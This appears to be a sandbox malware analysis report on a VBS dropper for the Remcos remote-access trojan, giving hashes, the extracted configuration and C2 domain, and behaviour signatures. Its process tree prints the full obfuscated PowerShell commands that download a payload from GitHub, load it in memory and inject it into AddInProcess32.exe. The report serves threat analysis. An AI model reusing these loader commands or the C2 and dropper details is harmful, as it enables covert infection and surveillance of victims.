Overview

overview

10

Static

static

1

31agosto.vbs

windows7-x64

10

31agosto.vbs

windows10-1703-x64

10

31agosto.vbs

windows10-2004-x64

10

31agosto.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    125s
  • max time network
    122s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04/10/2024, 22:21

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    31agosto.vbs

  • Size

    480KB

  • MD5

    b9dbaa8493f8539ec491076723a57f6d

  • SHA1

    c8b7f6625d77483f118ab91aa98a2e612feb714c

  • SHA256

    998c65637736fe8c32b932809868eb2ef60411273bb18d8f389b5f3e1c72ebc2

  • SHA512

    2d4a409d9fe88ac9aad7766db757a19b23ac6cd42650682de6db6d27ed3aa50ca84c7bb8af069458369d662f370c0361cbd4adb54fbebc694b8f7242443787d2

  • SSDEEP

    12288:kn7449lZb/RYfKsB5rGJxzJK37mBQHAIgfBkM0IzpyA22Xjidu2Bw41pk7/rXZ0z:e1Bcxo0

Score
10/10
remcosremotehostdiscoveryexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Extracted

Family

remcos

Botnet

RemoteHost

C2

sost2024ene.duckdns.org:1213

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-0AGASP

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31agosto.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU52T2tlLWV4UFJlc1NJb04gKCgnTk9mdXJsID0nKycgNVYwaHR0cCcrJ3M6Ly9yYScrJ3cuZ2l0JysnaHUnKydidXNlcmNvJysnbnQnKydlbnQuY29tL05vRGUnKyd0ZWN0T24vTm9EZXRlYycrJ3RPJysnbi9yJysnZWZzL2hlYWRzLycrJ21haW4nKycvRGUnKyd0JysnYWhObycrJ3RoLScrJ1YudCcrJ3h0JysnNVYwJysnOycrJyBOT2ZiYXNlNicrJzQnKydDb250ZW50JysnID0gKE5ldy1PYmonKydlY3QgUycrJ3lzdGVtLicrJ05ldC4nKydXZWJDbGllbnQpLkRvd25sJysnb2EnKydkUycrJ3RyJysnaW5nKE5PZnVybCk7ICcrJ05PZmJpbicrJ2FyeUNvbnRlJysnbnQnKycgPSBbJysnU3lzdGVtJysnLkNvJysnbicrJ3ZlcnRdOjpGJysncm9tQmEnKydzZTY0U3RyaW5nKE5PZmJhJysnc2U2NENvbnRlbnQpOyBOT2ZhcycrJ3NlbScrJ2JseSAnKyc9IFtSZScrJ2YnKydsZWN0aScrJ29uLkFzJysnc2VtYicrJ2x5JysnXTo6TCcrJ29hZChOT2ZiaScrJ25hcicrJ3lDb250ZW4nKyd0KTsgW2QnKydubGliLicrJ0lPJysnLkhvbWVdJysnOjpWQUkoSTJIdHh0JysnLnNvY21lci8nKydzZCcrJ2EnKydvbG53b2QnKycvc2FnY3NlZC8nKydmZGhiJysnZmR6JysnLycrJ2dyby50ZWtjJysndWInKyd0aWIvJysnLzpzcCcrJ3R0aEkySCwgJysnSTJIZCcrJ2VzYXRpdmFkb0kyJysnSCcrJywgSTJIZGVzYScrJ3RpdmFkbycrJ0kySCwgSTJIZGUnKydzYXQnKydpdmFkb0knKycySCcrJywnKycgSTInKydIQWRkSW4nKydQcm9jZScrJ3NzMzJJMkgsICcrJ0kySEkySCxJMkhJMkgpJykucmVQbEFjZSgoW0NoQXJdNTMrW0NoQXJdODYrW0NoQXJdNDgpLFtzVHJpbkddW0NoQXJdMzkpLnJlUGxBY2UoJ0kySCcsW3NUcmluR11bQ2hBcl0zNCkucmVQbEFjZSgoW0NoQXJdNzgrW0NoQXJdNzkrW0NoQXJdMTAyKSxbc1RyaW5HXVtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INvOke-exPResSIoN (('NOfurl ='+' 5V0http'+'s://ra'+'w.git'+'hu'+'buserco'+'nt'+'ent.com/NoDe'+'tectOn/NoDetec'+'tO'+'n/r'+'efs/heads/'+'main'+'/De'+'t'+'ahNo'+'th-'+'V.t'+'xt'+'5V0'+';'+' NOfbase6'+'4'+'Content'+' = (New-Obj'+'ect S'+'ystem.'+'Net.'+'WebClient).Downl'+'oa'+'dS'+'tr'+'ing(NOfurl); '+'NOfbin'+'aryConte'+'nt'+' = ['+'System'+'.Co'+'n'+'vert]::F'+'romBa'+'se64String(NOfba'+'se64Content); NOfas'+'sem'+'bly '+'= [Re'+'f'+'lecti'+'on.As'+'semb'+'ly'+']::L'+'oad(NOfbi'+'nar'+'yConten'+'t); [d'+'nlib.'+'IO'+'.Home]'+'::VAI(I2Htxt'+'.socmer/'+'sd'+'a'+'olnwod'+'/sagcsed/'+'fdhb'+'fdz'+'/'+'gro.tekc'+'ub'+'tib/'+'/:sp'+'tthI2H, '+'I2Hd'+'esativadoI2'+'H'+', I2Hdesa'+'tivado'+'I2H, I2Hde'+'sat'+'ivadoI'+'2H'+','+' I2'+'HAddIn'+'Proce'+'ss32I2H, '+'I2HI2H,I2HI2H)').rePlAce(([ChAr]53+[ChAr]86+[ChAr]48),[sTrinG][ChAr]39).rePlAce('I2H',[sTrinG][ChAr]34).rePlAce(([ChAr]78+[ChAr]79+[ChAr]102),[sTrinG][ChAr]36))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:4088
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:1280

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\remcos\logs.dat
            Filesize

            144B

            MD5

            6b852c879b52b606404252f5b235c6ce

            SHA1

            2a234a7bff94c30b0d8ddecc9372f5e123d3762d

            SHA256

            25dbb6e89d64fd75843c83d0c13d4bea0fc6ff4365809eb994891a7bee15c4e7

            SHA512

            de4f16ec8e99a19495030b2e61ce290e3412c528239cb1a8acfce55d09319fb816dcd02198ca87e4a9ae50561b066eae1a2e12b905ebd93775bf32a5c2c2d19c

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            3ebba88045d3c326e606026c8d303313

            SHA1

            5ae1efd7971f053d41cd72de77dbccb102160149

            SHA256

            b76d37f23c570263d214957deef474d0a0fdbc5194fd65d974584e6dc0600825

            SHA512

            ebac584ab568b0bc808643e259651a94d0ace34f6928e5a3857f32ca94ddff77b6b53fa809e9726726f7636874037dccbc440716f40907232455eae5798da367

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            4c4f9de58dd5a985f4384eaa9effc5c6

            SHA1

            d3f347af981edd4b9c972f3dfd2fd8b031f5beb1

            SHA256

            1ad3c60025fd6f80ebd17a07342683cc03e1166c91e2970730b68518db2ae75c

            SHA512

            6844d59ac5ebe1dfb3fbf3da593ac40ef22e29e1391a3e2b26ffca87451240fed3ad28c4a8c51579e9afbf0d809c9dff950f048eb77c1744e72c16ef436f28e7

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xogav1rx.sq4.ps1
            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

            Download Submit

          • memory/956-43-0x0000028640B40000-0x0000028640D60000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/1280-51-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-63-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-46-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-50-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-54-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-88-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-80-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-73-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-72-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-60-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-61-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/1280-62-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

            Download

          • memory/3560-0-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3560-5-0x00000257BCDD0000-0x00000257BCDF2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3560-59-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/3560-8-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/3560-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/3560-9-0x00000257BD0B0000-0x00000257BD126000-memory.dmp

            Filesize

            472KB

            Download